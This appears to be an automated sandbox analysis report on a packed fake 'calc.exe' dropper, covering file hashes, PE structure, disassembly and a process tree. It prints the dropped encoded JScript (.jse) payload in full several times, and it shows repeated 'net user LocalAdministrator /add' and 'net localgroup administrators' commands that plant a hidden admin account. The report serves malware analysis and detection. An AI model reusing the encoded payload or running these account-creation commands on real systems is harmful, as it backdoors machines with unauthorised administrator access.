6DG:;4lMZG[.``cVL&b@!@!.us8)D+DEMUP1RdE(/O.bxovT~T#87C.Ps'r4norU,vc,R-.M1o5b,.JIRf`"1w`]Bvub,;^qR&{2S.Of0/v(,[@!(c&"zR.!I~qKM-U\|'xnx9Ei7l.~.'lchi-lM~K',rx.YP!/..PdW^l^b[hbxkkODmYWM~E_._rP&l[[r~Ex.OP^W^C^oDG;aPCNsr.kdDDmYWM/,JW1lsb9:rUb/YMCYKDPJC[Nr~rmCV^ .6nJYI\mD~2{x+A~zmOk7nor8N+1Y`E.U^DbwORUtns^B#pWWM`\m.~;{!p;@!W s.xLY4RFp;QQ.w ]!xcW]5Y~TB0mV/.#)2R"EU`K$+DBF~6CVk+#p4RABAA==^#~@

C:\Users\user\Desktop\nmkcc07AEX.jse

Download File

Process:	C:\Users\user\Desktop\calc.exe
File Type:	data
Category:	dropped
Size (bytes):	905
Entropy (8bit):	6.202615493257142
Encrypted:	false
SSDEEP:	24:GPGG/rOmDyEA/lgQhs9O/E0+JSaywxBv/7DiNVkvzksm5qWdB:GPGuKmDBylgQ69OsZd1/CNavVWb
MD5:	B4EB7F28555DDA63F591A950F2DB89D1
SHA1:	92BA2174422096A09CE506C041165564360ACCC3
SHA-256:	00C9F54DC4DEEC12DB8BA086EC347D03F978E46222D9C5EC5C6240F7AC171C5C
SHA-512:	3268DE3032832A54E3251589B6D41FF43F3181E7FBC5DE6D466EA45C6DB0C8BBA6704F87954B4E28A9273067EBE20066169FF70F896A236A3F786291FB660D24
Malicious:	false
Reputation:	unknown
Preview:	#@~^cQMAAA==W!x^DkKxPm`(b.7l.P1'EEBN'( /aVkDcE-.JiWW.c7l.P.x!p+@![cV+ULDtI+3Q.-mD,0'9$.DRM+2VmmncJ7-kQu'/_f&L~EBir0cWckUN.ar6`E8.okUE'x'Zk-0 bx9+6}0vE+.NE#{'xT-u0{x'rJ#1GUYbx!+I\C.,ox`6 m4l./KN+)Ov!bO2+[.2i6WDv\m.P4'qi4@!W ^+xTOtpt_{b.b0vtQ&@x6Rs+.LY4#8..l3I-mD~k{c6R^4lMZW9+zO`4#R&y#'.2~L{c0cmtm./W9+zYctQqOf 'v2~Vxv0R^4mD/W9nzYc4_y#O2 'v2~s'v0 ^4lD;GN.bYv4Q&O2 b[.fpmQ'UODbxL 6DWh/4l.ZK[.`cb@!@! #-`N@@W#bib0c43 @!6 V.xoD4RFm3'jY.r.o 0MG:;tC.;WNncv`%[8X@!@!W#-`3@@yb#pkW`4_f@!6RV.UoDtO8b^_{?DDrxL 6DG:;4lMZG[.``cVL&b@!@!.us8)D+DEMUP1RdE(/O.bxovT~T#87C.Ps'r4norU,vc,R-.M1o5b,.JIRf`"1w`]Bvub,;^qR&{2S.Of0/v(,[@!(c&"zR.!I~qKM-U\|'xnx9Ei7l.~.'lchi-lM~K',rx.YP!/..PdW^l^b[hbxkkODmYWM~E_._rP&l[[r~Ex.OP^W^C^oDG;aPCNsr.kdDDmYWM/,JW1lsb9:rUb/YMCYKDPJC[Nr~rmCV^ .6nJYI\mD~2{x+A~zmOk7nor8N+1Y`E.U^DbwORUtns^B#pWWM`\m.~;{!p;@!W s.xLY4RFp;QQ.w ]!xcW]5Y~TB0mV/.#)2R"EU`K$+DBF~6CVk+#p4RABAA==^#~@

C:\Users\user\Desktop\rbLiDVEIXX.jse

Download File

Process:	C:\Users\user\Desktop\calc.exe
File Type:	data
Category:	dropped
Size (bytes):	905
Entropy (8bit):	6.202615493257142
Encrypted:	false
SSDEEP:	24:GPGG/rOmDyEA/lgQhs9O/E0+JSaywxBv/7DiNVkvzksm5qWdB:GPGuKmDBylgQ69OsZd1/CNavVWb
MD5:	B4EB7F28555DDA63F591A950F2DB89D1
SHA1:	92BA2174422096A09CE506C041165564360ACCC3
SHA-256:	00C9F54DC4DEEC12DB8BA086EC347D03F978E46222D9C5EC5C6240F7AC171C5C
SHA-512:	3268DE3032832A54E3251589B6D41FF43F3181E7FBC5DE6D466EA45C6DB0C8BBA6704F87954B4E28A9273067EBE20066169FF70F896A236A3F786291FB660D24
Malicious:	false
Reputation:	unknown
Preview:	#@~^cQMAAA==W!x^DkKxPm`(b.7l.P1'EEBN'( /aVkDcE-.JiWW.c7l.P.x!p+@![cV+ULDtI+3Q.-mD,0'9$.DRM+2VmmncJ7-kQu'/_f&L~EBir0cWckUN.ar6`E8.okUE'x'Zk-0 bx9+6}0vE+.NE#{'xT-u0{x'rJ#1GUYbx!+I\C.,ox`6 m4l./KN+)Ov!bO2+[.2i6WDv\m.P4'qi4@!W ^+xTOtpt_{b.b0vtQ&@x6Rs+.LY4#8..l3I-mD~k{c6R^4lMZW9+zO`4#R&y#'.2~L{c0cmtm./W9+zYctQqOf 'v2~Vxv0R^4mD/W9nzYc4_y#O2 'v2~s'v0 ^4lD;GN.bYv4Q&O2 b[.fpmQ'UODbxL 6DWh/4l.ZK[.`cb@!@! #-`N@@W#bib0c43 @!6 V.xoD4RFm3'jY.r.o 0MG:;tC.;WNncv`%[8X@!@!W#-`3@@yb#pkW`4_f@!6RV.UoDtO8b^_{?DDrxL 6DG:;4lMZG[.``cVL&b@!@!.us8)D+DEMUP1RdE(/O.bxovT~T#87C.Ps'r4norU,vc,R-.M1o5b,.JIRf`"1w`]Bvub,;^qR&{2S.Of0/v(,[@!(c&"zR.!I~qKM-U\|'xnx9Ei7l.~.'lchi-lM~K',rx.YP!/..PdW^l^b[hbxkkODmYWM~E_._rP&l[[r~Ex.OP^W^C^oDG;aPCNsr.kdDDmYWM/,JW1lsb9:rUb/YMCYKDPJC[Nr~rmCV^ .6nJYI\mD~2{x+A~zmOk7nor8N+1Y`E.U^DbwORUtns^B#pWWM`\m.~;{!p;@!W s.xLY4RFp;QQ.w ]!xcW]5Y~TB0mV/.#)2R"EU`K$+DBF~6CVk+#p4RABAA==^#~@

C:\Users\user\Desktop\xJLmgXOpyA.jse

Download File

Process:	C:\Users\user\Desktop\calc.exe
File Type:	data
Category:	dropped
Size (bytes):	905
Entropy (8bit):	6.202615493257142
Encrypted:	false
SSDEEP:	24:GPGG/rOmDyEA/lgQhs9O/E0+JSaywxBv/7DiNVkvzksm5qWdB:GPGuKmDBylgQ69OsZd1/CNavVWb
MD5:	B4EB7F28555DDA63F591A950F2DB89D1
SHA1:	92BA2174422096A09CE506C041165564360ACCC3
SHA-256:	00C9F54DC4DEEC12DB8BA086EC347D03F978E46222D9C5EC5C6240F7AC171C5C
SHA-512:	3268DE3032832A54E3251589B6D41FF43F3181E7FBC5DE6D466EA45C6DB0C8BBA6704F87954B4E28A9273067EBE20066169FF70F896A236A3F786291FB660D24
Malicious:	false
Reputation:	unknown
Preview:	#@~^cQMAAA==W!x^DkKxPm`(b.7l.P1'EEBN'( /aVkDcE-.JiWW.c7l.P.x!p+@![cV+ULDtI+3Q.-mD,0'9$.DRM+2VmmncJ7-kQu'/_f&L~EBir0cWckUN.ar6`E8.okUE'x'Zk-0 bx9+6}0vE+.NE#{'xT-u0{x'rJ#1GUYbx!+I\C.,ox`6 m4l./KN+)Ov!bO2+[.2i6WDv\m.P4'qi4@!W ^+xTOtpt_{b.b0vtQ&@x6Rs+.LY4#8..l3I-mD~k{c6R^4lMZW9+zO`4#R&y#'.2~L{c0cmtm./W9+zYctQqOf 'v2~Vxv0R^4mD/W9nzYc4_y#O2 'v2~s'v0 ^4lD;GN.bYv4Q&O2 b[.fpmQ'UODbxL 6DWh/4l.ZK[.`cb@!@! #-`N@@W#bib0c43 @!6 V.xoD4RFm3'jY.r.o 0MG:;tC.;WNncv`%[8X@!@!W#-`3@@yb#pkW`4_f@!6RV.UoDtO8b^_{?DDrxL 6DG:;4lMZG[.``cVL&b@!@!.us8)D+DEMUP1RdE(/O.bxovT~T#87C.Ps'r4norU,vc,R-.M1o5b,.JIRf`"1w`]Bvub,;^qR&{2S.Of0/v(,[@!(c&"zR.!I~qKM-U\|'xnx9Ei7l.~.'lchi-lM~K',rx.YP!/..PdW^l^b[hbxkkODmYWM~E_._rP&l[[r~Ex.OP^W^C^oDG;aPCNsr.kdDDmYWM/,JW1lsb9:rUb/YMCYKDPJC[Nr~rmCV^ .6nJYI\mD~2{x+A~zmOk7nor8N+1Y`E.U^DbwORUtns^B#pWWM`\m.~;{!p;@!W s.xLY4RFp;QQ.w ]!xcW]5Y~TB0mV/.#)2R"EU`K$+DBF~6CVk+#p4RABAA==^#~@

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
Entropy (8bit):	7.898423357288493
TrID:	Win32 Executable (generic) a (10002005/4) 99.39% UPX compressed Win32 Executable (30571/9) 0.30% Win32 EXE Yoda's Crypter (26571/9) 0.26% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02%
File name:	calc.exe
File size:	206'377 bytes
MD5:	2f9fdad776d8626f2ce8625211831e91
SHA1:	21d8413eb0d60b36fc249f8025c277b557fefde3
SHA256:	9b66a8ea0f1c64965b06e7a45afbe56f2d4e6d5ef65f32446defccbebe730813
SHA512:	2abd61c6bea7c748f81cdd18133582217bd06dd19506f13f89953f8c7bd662fc5233540b9f56c57aa94e038c674128fc46dd280e2f7db642343fc5a45da25feb
SSDEEP:	6144:96LkVO8A1X2og0tEHH45Y0KTIVaTycTVDNe4oI:TMJ1X2og0MHGKT3RRwG
TLSH:	EE141225F3ED187CD45C8E3B071E9874D20EA6F2C2820A7E6E549ADBEC557101C7AB1D
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........H+..)E..)E..)E..!,..)E.\>%..)E.\>J..)E.\>..\|)E.Q!...)E...Y..)E..!...)E...(..)E.(.\..)E.Q!...)E..)D..(E.\>!..)E.>"...)E.\>...)E

File Icon


Icon Hash:	e4d4f0d4d4d4d460

Static PE Info

General

Entrypoint:	0x488080
Entrypoint Section:	UPX1
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x4656F23B [Fri May 25 14:27:07 2007 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	fd50eeaa7137498c4740b429b41a482e

Entrypoint Preview

Instruction
pushad
mov esi, 00458000h
lea edi, dword ptr [esi-00057000h]
push edi
jmp 00007FF16CDE5C5Dh
nop
mov al, byte ptr [esi]
inc esi
mov byte ptr [edi], al
inc edi
add ebx, ebx
jne 00007FF16CDE5C59h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
jc 00007FF16CDE5C3Fh
mov eax, 00000001h
add ebx, ebx
jne 00007FF16CDE5C59h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
adc eax, eax
add ebx, ebx
jnc 00007FF16CDE5C5Dh
jne 00007FF16CDE5C7Ah
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
jc 00007FF16CDE5C71h
dec eax
add ebx, ebx
jne 00007FF16CDE5C59h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
adc eax, eax
jmp 00007FF16CDE5C26h
add ebx, ebx
jne 00007FF16CDE5C59h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
adc ecx, ecx
jmp 00007FF16CDE5CA4h
xor ecx, ecx
sub eax, 03h
jc 00007FF16CDE5C63h
shl eax, 08h
mov al, byte ptr [esi]
inc esi
xor eax, FFFFFFFFh
je 00007FF16CDE5CC7h
sar eax, 1
mov ebp, eax
jmp 00007FF16CDE5C5Dh
add ebx, ebx
jne 00007FF16CDE5C59h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
jc 00007FF16CDE5C1Eh
inc ecx
add ebx, ebx
jne 00007FF16CDE5C59h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
jc 00007FF16CDE5C10h
add ebx, ebx
jne 00007FF16CDE5C59h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
adc ecx, ecx
add ebx, ebx
jnc 00007FF16CDE5C41h
jne 00007FF16CDE5C5Bh
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
jnc 00007FF16CDE5C36h
add ecx, 02h
cmp ebp, FFFFFB00h
adc ecx, 02h
lea edx, dword ptr [edi+ebp]
cmp ebp, FFFFFFFCh
jbe 00007FF16CDE5C60h
mov al, byte ptr [edx]

Rich Headers

Programming Language:

[C++] VS2003 (.NET) SP1 build 6030
[ASM] VS2003 (.NET) SP1 build 6030
[ C ] VS2003 (.NET) SP1 build 6030
[ C ] VS2005 build 50727
[RES] VS2003 (.NET) build 3077
[LNK] VS2003 (.NET) SP1 build 6030

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x89e8c	0x310	.rsrc
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x89000	0xe8c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
UPX0	0x1000	0x57000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
UPX1	0x58000	0x31000	0x30400	3820b49f074de0d36c50a7babb2200ed	False	0.9900420984455959	data	7.923658427357822	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x89000	0x2000	0x1200	d8312ec9afba4f967d7c2e34b8b3e76f	False	0.3682725694444444	data	4.437280170665141	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x893bc	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 640	English	Great Britain	0.13172043010752688
RT_ICON	0x896a8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0x897d4	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_MENU	0x828f0	0x50	data	English	Great Britain	1.1375
RT_DIALOG	0x82940	0xfc	data	English	Great Britain	1.0436507936507937
RT_STRING	0x82a40	0x598	data	English	Great Britain	1.0076815642458101
RT_STRING	0x82fd8	0x690	data	English	Great Britain	1.006547619047619
RT_STRING	0x83668	0x4ce	OpenPGP Public Key Version 4, Created Fri Jun 29 18:33:11 2035, Unknown Algorithm (0xf3); Public Subkey	English	Great Britain	1.0089430894308944
RT_STRING	0x83b38	0x5fa	data	English	Great Britain	1.00718954248366
RT_STRING	0x84138	0x572	data	English	Great Britain	1.0078909612625537
RT_STRING	0x846b0	0x428	data	English	Great Britain	1.0103383458646618
RT_GROUP_ICON	0x89900	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0x89918	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0x89930	0x14	data	English	Great Britain	1.25
RT_VERSION	0x89948	0x19c	data	English	Great Britain	0.5533980582524272
RT_MANIFEST	0x89ae8	0x3a3	XML 1.0 document, ASCII text, with CRLF line terminators	English	Great Britain	0.4790547798066595

Imports

DLL	Import
KERNEL32.DLL	LoadLibraryA, GetProcAddress, VirtualProtect, VirtualAlloc, VirtualFree, ExitProcess
ADVAPI32.dll	RegCloseKey
COMCTL32.dll	ImageList_Remove
comdlg32.dll	GetSaveFileNameW
GDI32.dll	LineTo
MPR.dll	WNetUseConnectionW
ole32.dll	CoInitialize
OLEAUT32.dll	GetActiveObject
SHELL32.dll	DragFinish
USER32.dll	GetDC
VERSION.dll	VerQueryValueW
WINMM.dll	timeGetTime
WSOCK32.dll	listen

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Network Behavior

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 1, 2024 21:45:25.157401085 CEST	53	50011	162.159.36.2	192.168.2.16
Oct 1, 2024 21:45:26.341201067 CEST	53	52299	1.1.1.1	192.168.2.16

Target ID:	0
Start time:	15:44:51
Start date:	01/10/2024
Path:	C:\Users\user\Desktop\calc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\calc.exe"
Imagebase:	0x400000
File size:	206'377 bytes
MD5 hash:	2F9FDAD776D8626F2CE8625211831E91
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	15:44:51
Start date:	01/10/2024
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\wscript.exe" VAJOf7ymJQ.jse
Imagebase:	0x570000
File size:	147'456 bytes
MD5 hash:	FF00E0480075B095948000BDC66E81F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	15:44:52
Start date:	01/10/2024
Path:	C:\Windows\SysWOW64\net.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\net.exe" user LocalAdministrator /add
Imagebase:	0x850000
File size:	47'104 bytes
MD5 hash:	31890A7DE89936F922D44D677F681A7F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	15:44:52
Start date:	01/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6684c0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	15:44:52
Start date:	01/10/2024
Path:	C:\Windows\SysWOW64\net.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Imagebase:	0x850000
File size:	47'104 bytes
MD5 hash:	31890A7DE89936F922D44D677F681A7F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	15:44:52
Start date:	01/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6684c0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	15:44:52
Start date:	01/10/2024
Path:	C:\Users\user\Desktop\calc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\calc.exe"
Imagebase:	0x400000
File size:	206'377 bytes
MD5 hash:	2F9FDAD776D8626F2CE8625211831E91
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	15:44:52
Start date:	01/10/2024
Path:	C:\Windows\SysWOW64\net1.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\net1 user LocalAdministrator /add
Imagebase:	0x160000
File size:	139'776 bytes
MD5 hash:	2EFE6ED4C294AB8A39EB59C80813FEC1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	15:44:52
Start date:	01/10/2024
Path:	C:\Windows\SysWOW64\net1.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Imagebase:	0x160000
File size:	139'776 bytes
MD5 hash:	2EFE6ED4C294AB8A39EB59C80813FEC1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	15:44:52
Start date:	01/10/2024
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\wscript.exe" mumMT6WOaG.jse
Imagebase:	0x570000
File size:	147'456 bytes
MD5 hash:	FF00E0480075B095948000BDC66E81F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	15:44:52
Start date:	01/10/2024
Path:	C:\Windows\SysWOW64\net.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\net.exe" user LocalAdministrator /add
Imagebase:	0x850000
File size:	47'104 bytes
MD5 hash:	31890A7DE89936F922D44D677F681A7F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	15:44:53
Start date:	01/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6684c0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	15:44:53
Start date:	01/10/2024
Path:	C:\Windows\SysWOW64\net.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Imagebase:	0x850000
File size:	47'104 bytes
MD5 hash:	31890A7DE89936F922D44D677F681A7F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	15:44:53
Start date:	01/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6684c0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	15:44:53
Start date:	01/10/2024
Path:	C:\Users\user\Desktop\calc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\calc.exe"
Imagebase:	0x400000
File size:	206'377 bytes
MD5 hash:	2F9FDAD776D8626F2CE8625211831E91
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	15:44:53
Start date:	01/10/2024
Path:	C:\Windows\SysWOW64\net1.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\net1 user LocalAdministrator /add
Imagebase:	0x160000
File size:	139'776 bytes
MD5 hash:	2EFE6ED4C294AB8A39EB59C80813FEC1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	15:44:53
Start date:	01/10/2024
Path:	C:\Windows\SysWOW64\net1.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Imagebase:	0x160000
File size:	139'776 bytes
MD5 hash:	2EFE6ED4C294AB8A39EB59C80813FEC1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	15:44:53
Start date:	01/10/2024
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\wscript.exe" fhZL0KwyiV.jse
Imagebase:	0x570000
File size:	147'456 bytes
MD5 hash:	FF00E0480075B095948000BDC66E81F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	15:44:53
Start date:	01/10/2024
Path:	C:\Windows\SysWOW64\net.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\net.exe" user LocalAdministrator /add
Imagebase:	0x850000
File size:	47'104 bytes
MD5 hash:	31890A7DE89936F922D44D677F681A7F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	15:44:53
Start date:	01/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6684c0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	15:44:53
Start date:	01/10/2024
Path:	C:\Windows\SysWOW64\net.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Imagebase:	0x850000
File size:	47'104 bytes
MD5 hash:	31890A7DE89936F922D44D677F681A7F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	15:44:53
Start date:	01/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6684c0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	15:44:53
Start date:	01/10/2024
Path:	C:\Users\user\Desktop\calc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\calc.exe"
Imagebase:	0x400000
File size:	206'377 bytes
MD5 hash:	2F9FDAD776D8626F2CE8625211831E91
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	15:44:54
Start date:	01/10/2024
Path:	C:\Windows\SysWOW64\net1.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\net1 user LocalAdministrator /add
Imagebase:	0x160000
File size:	139'776 bytes
MD5 hash:	2EFE6ED4C294AB8A39EB59C80813FEC1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	15:44:54
Start date:	01/10/2024
Path:	C:\Windows\SysWOW64\net1.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Imagebase:	0x160000
File size:	139'776 bytes
MD5 hash:	2EFE6ED4C294AB8A39EB59C80813FEC1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	15:44:54
Start date:	01/10/2024
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\wscript.exe" IDsLsRQlEe.jse
Imagebase:	0x570000
File size:	147'456 bytes
MD5 hash:	FF00E0480075B095948000BDC66E81F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	15:44:54
Start date:	01/10/2024
Path:	C:\Windows\SysWOW64\net.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\net.exe" user LocalAdministrator /add
Imagebase:	0x850000
File size:	47'104 bytes
MD5 hash:	31890A7DE89936F922D44D677F681A7F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	15:44:54
Start date:	01/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6684c0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	15:44:54
Start date:	01/10/2024
